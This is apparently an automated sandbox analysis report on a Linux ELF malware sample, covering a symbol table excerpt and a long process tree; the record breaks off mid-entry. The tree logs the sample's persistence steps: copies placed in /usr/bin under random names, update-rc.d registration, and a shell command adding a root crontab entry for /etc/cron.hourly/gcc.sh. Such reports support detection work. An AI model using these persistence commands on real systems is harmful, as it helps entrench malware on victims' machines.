__memchr	.symtab	0x8066760	411	FUNC	<unknown>	DEFAULT	3
__mempcpy	.symtab	0x8066a20	68	FUNC	<unknown>	DEFAULT	3
__mkdir	.symtab	0x8068d60	31	FUNC	<unknown>	DEFAULT	3
__mktime_internal	.symtab	0x809f300	2437	FUNC	<unknown>	DEFAULT	3
__mmap	.symtab	0x8069da0	67	FUNC	<unknown>	DEFAULT	3
__mmap64	.symtab	0x8069df0	88	FUNC	<unknown>	DEFAULT	3
__mon_yday	.symtab	0x80c72c0	52	OBJECT	<unknown>	DEFAULT	7
__morecore	.symtab	0x80cf9e8	4	OBJECT	<unknown>	DEFAULT	21
__mpn_add_n	.symtab	0x80aa690	144	FUNC	<unknown>	DEFAULT	3
__mpn_addmul_1	.symtab	0x80aa720	60	FUNC	<unknown>	DEFAULT	3
__mpn_cmp	.symtab	0x8096b60	92	FUNC	<unknown>	DEFAULT	3
__mpn_construct_double	.symtab	0x80aa7a0	86	FUNC	<unknown>	DEFAULT	3
__mpn_construct_float	.symtab	0x80aa760	49	FUNC	<unknown>	DEFAULT	3
__mpn_construct_long_double	.symtab	0x80aa800	71	FUNC	<unknown>	DEFAULT	3
__mpn_divrem	.symtab	0x8096bc0	1112	FUNC	<unknown>	DEFAULT	3
__mpn_extract_double	.symtab	0x80988b0	244	FUNC	<unknown>	DEFAULT	3
__mpn_extract_long_double	.symtab	0x80989b0	279	FUNC	<unknown>	DEFAULT	3
__mpn_impn_mul_n	.symtab	0x8097670	1989	FUNC	<unknown>	DEFAULT	3
__mpn_impn_mul_n_basecase	.symtab	0x8097570	247	FUNC	<unknown>	DEFAULT	3
__mpn_impn_sqr_n	.symtab	0x8097e40	1829	FUNC	<unknown>	DEFAULT	3
__mpn_impn_sqr_n_basecase	.symtab	0x8097470	250	FUNC	<unknown>	DEFAULT	3
__mpn_lshift	.symtab	0x8097020	87	FUNC	<unknown>	DEFAULT	3
__mpn_mul	.symtab	0x80970e0	843	FUNC	<unknown>	DEFAULT	3
__mpn_mul_1	.symtab	0x8097430	57	FUNC	<unknown>	DEFAULT	3
__mpn_mul_n	.symtab	0x8098570	620	FUNC	<unknown>	DEFAULT	3
__mpn_rshift	.symtab	0x8097080	87	FUNC	<unknown>	DEFAULT	3
__mpn_sub_n	.symtab	0x80987e0	144	FUNC	<unknown>	DEFAULT	3
__mpn_submul_1	.symtab	0x8098870	60	FUNC	<unknown>	DEFAULT	3
__mprotect	.symtab	0x8069e70	33	FUNC	<unknown>	DEFAULT	3
__mremap	.symtab	0x806add0	45	FUNC	<unknown>	DEFAULT	3
__munmap	.symtab	0x8069e50	31	FUNC	<unknown>	DEFAULT	3
__nanosleep	.symtab	0x80677b0	87	FUNC	<unknown>	DEFAULT	3
__nanosleep_nocancel	.symtab	0x80677ba	31	FUNC	<unknown>	DEFAULT	3
__new_exitfn	.symtab	0x8056000	274	FUNC	<unknown>	DEFAULT	3
__new_exitfn_called	.symtab	0x80d6240	8	OBJECT	<unknown>	DEFAULT	22
__new_fclose	.symtab	0x8057df0	439	FUNC	<unknown>	DEFAULT	3
__new_fopen	.symtab	0x80582a0	34	FUNC	<unknown>	DEFAULT	3
__new_getrlimit	.symtab	0x8069030	54	FUNC	<unknown>	DEFAULT	3
__new_sem_init	.symtab	0x8053320	84	FUNC	<unknown>	DEFAULT	3
__new_sem_post	.symtab	0x8053420	78	FUNC	<unknown>	DEFAULT	3
__new_sem_wait	.symtab	0x8053380	141	FUNC	<unknown>	DEFAULT	3
__nptl_create_event	.symtab	0x8054700	5	FUNC	<unknown>	DEFAULT	3
__nptl_deallocate_tsd	.symtab	0x8050980	278	FUNC	<unknown>	DEFAULT	3
__nptl_death_event	.symtab	0x8054710	5	FUNC	<unknown>	DEFAULT	3
__nptl_initial_report_events	.symtab	0x80d20cc	1	OBJECT	<unknown>	DEFAULT	22
__nptl_last_event	.symtab	0x80d20c0	4	OBJECT	<unknown>	DEFAULT	22
__nptl_nthreads	.symtab	0x80cf4f0	4	OBJECT	<unknown>	DEFAULT	21
__nptl_setxid	.symtab	0x8050e60	941	FUNC	<unknown>	DEFAULT	3
__nptl_threads_events	.symtab	0x80d20b8	8	OBJECT	<unknown>	DEFAULT	22
__offtime	.symtab	0x809f010	746	FUNC	<unknown>	DEFAULT	3
__open	.symtab	0x8053d80	91	FUNC	<unknown>	DEFAULT	3
__open_nocancel	.symtab	0x8053d8a	33	FUNC	<unknown>	DEFAULT	3
__opendir	.symtab	0x80672a0	220	FUNC	<unknown>	DEFAULT	3
__overflow	.symtab	0x805d810	41	FUNC	<unknown>	DEFAULT	3
__parse_one_specmb	.symtab	0x8083480	1320	FUNC	<unknown>	DEFAULT	3
__pause_nocancel	.symtab	0x8053dea	19	FUNC	<unknown>	DEFAULT	3
__posix_memalign	.symtab	0x80640d0	111	FUNC	<unknown>	DEFAULT	3
__preinit_array_end	.symtab	0x80cf120	0	NOTYPE	<unknown>	HIDDEN	14
__preinit_array_start	.symtab	0x80cf120	0	NOTYPE	<unknown>	HIDDEN	14
__printf_arginfo_table	.symtab	0x80d63e0	4	OBJECT	<unknown>	DEFAULT	23
__printf_fp	.symtab	0x807f620	9363	FUNC	<unknown>	DEFAULT	3
__printf_fphex	.symtab	0x8081b50	6104	FUNC	<unknown>	DEFAULT	3

Network Behavior

⊘Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

System Behavior

Analysis Process: dptxrnhxmx.elf PID: 6208, Parent PID: 6123

General

Start time (UTC):	15:51:46
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	/tmp/dptxrnhxmx.elf
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6209, Parent PID: 6208

General

Start time (UTC):	15:51:46
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6210, Parent PID: 6209

General

Start time (UTC):	15:51:46
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6211, Parent PID: 6210

General

Start time (UTC):	15:51:46
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6212, Parent PID: 6209

General

Start time (UTC):	15:51:46
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6213, Parent PID: 6212

General

Start time (UTC):	15:51:46
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: update-rc.d PID: 6213, Parent PID: 1860

General

Start time (UTC):	15:51:46
Start date (UTC):	29/10/2023
Path:	/sbin/update-rc.d
Arguments:	update-rc.d dptxrnhxmx.elf defaults
File size:	3478464 bytes
MD5 hash:	16a21f464119ea7fad1d3660de963637

Chronological Activities

Analysis Process: update-rc.d PID: 6219, Parent PID: 6213

General

Start time (UTC):	15:51:47
Start date (UTC):	29/10/2023
Path:	/sbin/update-rc.d
Arguments:	-
File size:	3478464 bytes
MD5 hash:	16a21f464119ea7fad1d3660de963637

Chronological Activities

Analysis Process: systemctl PID: 6219, Parent PID: 6213

General

Start time (UTC):	15:51:47
Start date (UTC):	29/10/2023
Path:	/bin/systemctl
Arguments:	systemctl daemon-reload
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6214, Parent PID: 6209

General

Start time (UTC):	15:51:46
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: sh PID: 6214, Parent PID: 6209

General

Start time (UTC):	15:51:46
Start date (UTC):	29/10/2023
Path:	/bin/sh
Arguments:	sh -c "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 6215, Parent PID: 6214

General

Start time (UTC):	15:51:46
Start date (UTC):	29/10/2023
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sed PID: 6215, Parent PID: 6214

General

Start time (UTC):	15:51:46
Start date (UTC):	29/10/2023
Path:	/bin/sed
Arguments:	sed -i /\\/etc\\/cron.hourly\\/gcc.sh/d /etc/crontab
File size:	121288 bytes
MD5 hash:	885062561f66aa1d4af4c54b9e7cc81a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6243, Parent PID: 6209

General

Start time (UTC):	15:51:52
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6244, Parent PID: 6243

General

Start time (UTC):	15:51:52
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: qabtuykfdb PID: 6244, Parent PID: 6243

General

Start time (UTC):	15:51:52
Start date (UTC):	29/10/2023
Path:	/usr/bin/qabtuykfdb
Arguments:	/usr/bin/qabtuykfdb sh 6209
File size:	625889 bytes
MD5 hash:	cfc60e87b79b9fda780d09582c8ffd8a

Chronological Activities

Analysis Process: qabtuykfdb PID: 6245, Parent PID: 6244

General

Start time (UTC):	15:51:52
Start date (UTC):	29/10/2023
Path:	/usr/bin/qabtuykfdb
Arguments:	-
File size:	625889 bytes
MD5 hash:	cfc60e87b79b9fda780d09582c8ffd8a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6246, Parent PID: 6209

General

Start time (UTC):	15:51:52
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6247, Parent PID: 6246

General

Start time (UTC):	15:51:52
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: qabtuykfdb PID: 6247, Parent PID: 6246

General

Start time (UTC):	15:51:52
Start date (UTC):	29/10/2023
Path:	/usr/bin/qabtuykfdb
Arguments:	/usr/bin/qabtuykfdb uptime 6209
File size:	625889 bytes
MD5 hash:	cfc60e87b79b9fda780d09582c8ffd8a

Chronological Activities

Analysis Process: qabtuykfdb PID: 6250, Parent PID: 6247

General

Start time (UTC):	15:51:52
Start date (UTC):	29/10/2023
Path:	/usr/bin/qabtuykfdb
Arguments:	-
File size:	625889 bytes
MD5 hash:	cfc60e87b79b9fda780d09582c8ffd8a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6248, Parent PID: 6209

General

Start time (UTC):	15:51:52
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6249, Parent PID: 6248

General

Start time (UTC):	15:51:52
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: qabtuykfdb PID: 6249, Parent PID: 6248

General

Start time (UTC):	15:51:52
Start date (UTC):	29/10/2023
Path:	/usr/bin/qabtuykfdb
Arguments:	/usr/bin/qabtuykfdb "netstat -an" 6209
File size:	625889 bytes
MD5 hash:	cfc60e87b79b9fda780d09582c8ffd8a

Chronological Activities

Analysis Process: qabtuykfdb PID: 6253, Parent PID: 6249

General

Start time (UTC):	15:51:52
Start date (UTC):	29/10/2023
Path:	/usr/bin/qabtuykfdb
Arguments:	-
File size:	625889 bytes
MD5 hash:	cfc60e87b79b9fda780d09582c8ffd8a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6251, Parent PID: 6209

General

Start time (UTC):	15:51:52
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6252, Parent PID: 6251

General

Start time (UTC):	15:51:52
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: qabtuykfdb PID: 6252, Parent PID: 6251

General

Start time (UTC):	15:51:52
Start date (UTC):	29/10/2023
Path:	/usr/bin/qabtuykfdb
Arguments:	/usr/bin/qabtuykfdb id 6209
File size:	625889 bytes
MD5 hash:	cfc60e87b79b9fda780d09582c8ffd8a

Chronological Activities

Analysis Process: qabtuykfdb PID: 6256, Parent PID: 6252

General

Start time (UTC):	15:51:52
Start date (UTC):	29/10/2023
Path:	/usr/bin/qabtuykfdb
Arguments:	-
File size:	625889 bytes
MD5 hash:	cfc60e87b79b9fda780d09582c8ffd8a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6254, Parent PID: 6209

General

Start time (UTC):	15:51:52
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6255, Parent PID: 6254

General

Start time (UTC):	15:51:52
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: qabtuykfdb PID: 6255, Parent PID: 6254

General

Start time (UTC):	15:51:52
Start date (UTC):	29/10/2023
Path:	/usr/bin/qabtuykfdb
Arguments:	/usr/bin/qabtuykfdb "netstat -an" 6209
File size:	625889 bytes
MD5 hash:	cfc60e87b79b9fda780d09582c8ffd8a

Chronological Activities

Analysis Process: qabtuykfdb PID: 6257, Parent PID: 6255

General

Start time (UTC):	15:51:52
Start date (UTC):	29/10/2023
Path:	/usr/bin/qabtuykfdb
Arguments:	-
File size:	625889 bytes
MD5 hash:	cfc60e87b79b9fda780d09582c8ffd8a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6298, Parent PID: 6209

General

Start time (UTC):	15:52:28
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6299, Parent PID: 6298

General

Start time (UTC):	15:52:28
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: wrvptdarnp PID: 6299, Parent PID: 6298

General

Start time (UTC):	15:52:28
Start date (UTC):	29/10/2023
Path:	/usr/bin/wrvptdarnp
Arguments:	/usr/bin/wrvptdarnp pwd 6209
File size:	625889 bytes
MD5 hash:	ddf045010b43b44731521349ab7be7b9

Chronological Activities

Analysis Process: wrvptdarnp PID: 6300, Parent PID: 6299

General

Start time (UTC):	15:52:28
Start date (UTC):	29/10/2023
Path:	/usr/bin/wrvptdarnp
Arguments:	-
File size:	625889 bytes
MD5 hash:	ddf045010b43b44731521349ab7be7b9

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6301, Parent PID: 6209

General

Start time (UTC):	15:52:28
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6302, Parent PID: 6301

General

Start time (UTC):	15:52:28
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: wrvptdarnp PID: 6302, Parent PID: 6301

General

Start time (UTC):	15:52:28
Start date (UTC):	29/10/2023
Path:	/usr/bin/wrvptdarnp
Arguments:	/usr/bin/wrvptdarnp top 6209
File size:	625889 bytes
MD5 hash:	ddf045010b43b44731521349ab7be7b9

Chronological Activities

Analysis Process: wrvptdarnp PID: 6303, Parent PID: 6302

General

Start time (UTC):	15:52:28
Start date (UTC):	29/10/2023
Path:	/usr/bin/wrvptdarnp
Arguments:	-
File size:	625889 bytes
MD5 hash:	ddf045010b43b44731521349ab7be7b9

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6304, Parent PID: 6209

General

Start time (UTC):	15:52:28
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6305, Parent PID: 6304

General

Start time (UTC):	15:52:28
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: wrvptdarnp PID: 6305, Parent PID: 6304

General

Start time (UTC):	15:52:28
Start date (UTC):	29/10/2023
Path:	/usr/bin/wrvptdarnp
Arguments:	/usr/bin/wrvptdarnp "ifconfig eth0" 6209
File size:	625889 bytes
MD5 hash:	ddf045010b43b44731521349ab7be7b9

Chronological Activities

Analysis Process: wrvptdarnp PID: 6306, Parent PID: 6305

General

Start time (UTC):	15:52:28
Start date (UTC):	29/10/2023
Path:	/usr/bin/wrvptdarnp
Arguments:	-
File size:	625889 bytes
MD5 hash:	ddf045010b43b44731521349ab7be7b9

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6307, Parent PID: 6209

General

Start time (UTC):	15:52:28
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6308, Parent PID: 6307

General

Start time (UTC):	15:52:28
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: wrvptdarnp PID: 6308, Parent PID: 6307

General

Start time (UTC):	15:52:28
Start date (UTC):	29/10/2023
Path:	/usr/bin/wrvptdarnp
Arguments:	/usr/bin/wrvptdarnp "netstat -an" 6209
File size:	625889 bytes
MD5 hash:	ddf045010b43b44731521349ab7be7b9

Chronological Activities

Analysis Process: wrvptdarnp PID: 6311, Parent PID: 6308

General

Start time (UTC):	15:52:29
Start date (UTC):	29/10/2023
Path:	/usr/bin/wrvptdarnp
Arguments:	-
File size:	625889 bytes
MD5 hash:	ddf045010b43b44731521349ab7be7b9

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6309, Parent PID: 6209

General

Start time (UTC):	15:52:29
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6310, Parent PID: 6309

General

Start time (UTC):	15:52:29
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: wrvptdarnp PID: 6310, Parent PID: 6309

General

Start time (UTC):	15:52:29
Start date (UTC):	29/10/2023
Path:	/usr/bin/wrvptdarnp
Arguments:	/usr/bin/wrvptdarnp sh 6209
File size:	625889 bytes
MD5 hash:	ddf045010b43b44731521349ab7be7b9

Chronological Activities

Analysis Process: wrvptdarnp PID: 6312, Parent PID: 6310

General

Start time (UTC):	15:52:29
Start date (UTC):	29/10/2023
Path:	/usr/bin/wrvptdarnp
Arguments:	-
File size:	625889 bytes
MD5 hash:	ddf045010b43b44731521349ab7be7b9

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6316, Parent PID: 6209

General

Start time (UTC):	15:52:34
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6317, Parent PID: 6316

General

Start time (UTC):	15:52:34
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: mbeioyodii PID: 6317, Parent PID: 6316

General

Start time (UTC):	15:52:34
Start date (UTC):	29/10/2023
Path:	/usr/bin/mbeioyodii
Arguments:	/usr/bin/mbeioyodii uptime 6209
File size:	625889 bytes
MD5 hash:	25bbb89787f3d46fd40211220f087144

Chronological Activities

Analysis Process: mbeioyodii PID: 6318, Parent PID: 6317

General

Start time (UTC):	15:52:34
Start date (UTC):	29/10/2023
Path:	/usr/bin/mbeioyodii
Arguments:	-
File size:	625889 bytes
MD5 hash:	25bbb89787f3d46fd40211220f087144

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6319, Parent PID: 6209

General

Start time (UTC):	15:52:34
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6320, Parent PID: 6319

General

Start time (UTC):	15:52:34
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: mbeioyodii PID: 6320, Parent PID: 6319

General

Start time (UTC):	15:52:34
Start date (UTC):	29/10/2023
Path:	/usr/bin/mbeioyodii
Arguments:	/usr/bin/mbeioyodii "grep \"A\"" 6209
File size:	625889 bytes
MD5 hash:	25bbb89787f3d46fd40211220f087144

Chronological Activities

Analysis Process: mbeioyodii PID: 6321, Parent PID: 6320

General

Start time (UTC):	15:52:34
Start date (UTC):	29/10/2023
Path:	/usr/bin/mbeioyodii
Arguments:	-
File size:	625889 bytes
MD5 hash:	25bbb89787f3d46fd40211220f087144

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6322, Parent PID: 6209

General

Start time (UTC):	15:52:34
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6323, Parent PID: 6322

General

Start time (UTC):	15:52:34
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: mbeioyodii PID: 6323, Parent PID: 6322

General

Start time (UTC):	15:52:34
Start date (UTC):	29/10/2023
Path:	/usr/bin/mbeioyodii
Arguments:	/usr/bin/mbeioyodii uptime 6209
File size:	625889 bytes
MD5 hash:	25bbb89787f3d46fd40211220f087144

Chronological Activities

Analysis Process: mbeioyodii PID: 6324, Parent PID: 6323

General

Start time (UTC):	15:52:34
Start date (UTC):	29/10/2023
Path:	/usr/bin/mbeioyodii
Arguments:	-
File size:	625889 bytes
MD5 hash:	25bbb89787f3d46fd40211220f087144

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6325, Parent PID: 6209

General

Start time (UTC):	15:52:34
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6326, Parent PID: 6325

General

Start time (UTC):	15:52:34
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: mbeioyodii PID: 6326, Parent PID: 6325

General

Start time (UTC):	15:52:34
Start date (UTC):	29/10/2023
Path:	/usr/bin/mbeioyodii
Arguments:	/usr/bin/mbeioyodii uptime 6209
File size:	625889 bytes
MD5 hash:	25bbb89787f3d46fd40211220f087144

Chronological Activities

Analysis Process: mbeioyodii PID: 6329, Parent PID: 6326

General

Start time (UTC):	15:52:35
Start date (UTC):	29/10/2023
Path:	/usr/bin/mbeioyodii
Arguments:	-
File size:	625889 bytes
MD5 hash:	25bbb89787f3d46fd40211220f087144

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6327, Parent PID: 6209

General

Start time (UTC):	15:52:35
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6328, Parent PID: 6327

General

Start time (UTC):	15:52:35
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: mbeioyodii PID: 6328, Parent PID: 6327

General

Start time (UTC):	15:52:35
Start date (UTC):	29/10/2023
Path:	/usr/bin/mbeioyodii
Arguments:	/usr/bin/mbeioyodii id 6209
File size:	625889 bytes
MD5 hash:	25bbb89787f3d46fd40211220f087144

Chronological Activities

Analysis Process: mbeioyodii PID: 6332, Parent PID: 6328

General

Start time (UTC):	15:52:35
Start date (UTC):	29/10/2023
Path:	/usr/bin/mbeioyodii
Arguments:	-
File size:	625889 bytes
MD5 hash:	25bbb89787f3d46fd40211220f087144

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6337, Parent PID: 6209

General

Start time (UTC):	15:52:40
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6338, Parent PID: 6337

General

Start time (UTC):	15:52:40
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: wobaryykiz PID: 6338, Parent PID: 6337

General

Start time (UTC):	15:52:40
Start date (UTC):	29/10/2023
Path:	/usr/bin/wobaryykiz
Arguments:	/usr/bin/wobaryykiz ifconfig 6209
File size:	625889 bytes
MD5 hash:	f82e5b84c6eee7c90e56ee733682e625

Chronological Activities

Analysis Process: wobaryykiz PID: 6339, Parent PID: 6338

General

Start time (UTC):	15:52:40
Start date (UTC):	29/10/2023
Path:	/usr/bin/wobaryykiz
Arguments:	-
File size:	625889 bytes
MD5 hash:	f82e5b84c6eee7c90e56ee733682e625

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6340, Parent PID: 6209

General

Start time (UTC):	15:52:40
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6341, Parent PID: 6340

General

Start time (UTC):	15:52:40
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: wobaryykiz PID: 6341, Parent PID: 6340

General

Start time (UTC):	15:52:40
Start date (UTC):	29/10/2023
Path:	/usr/bin/wobaryykiz
Arguments:	/usr/bin/wobaryykiz ls 6209
File size:	625889 bytes
MD5 hash:	f82e5b84c6eee7c90e56ee733682e625

Chronological Activities

Analysis Process: wobaryykiz PID: 6342, Parent PID: 6341

General

Start time (UTC):	15:52:40
Start date (UTC):	29/10/2023
Path:	/usr/bin/wobaryykiz
Arguments:	-
File size:	625889 bytes
MD5 hash:	f82e5b84c6eee7c90e56ee733682e625

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6343, Parent PID: 6209

General

Start time (UTC):	15:52:41
Start date (UTC):	29/10/2023
Path:	/tmp/dptxrnhxmx.elf
Arguments:	-
File size:	625878 bytes
MD5 hash:	85682d3effdb2d559fd84df491e9461a

Chronological Activities

Analysis Process: dptxrnhxmx.elf PID: 6344, Parent PID: 6343

General

Start time (UTC):	15:52:41
Start date (UTC):	29/10/2023
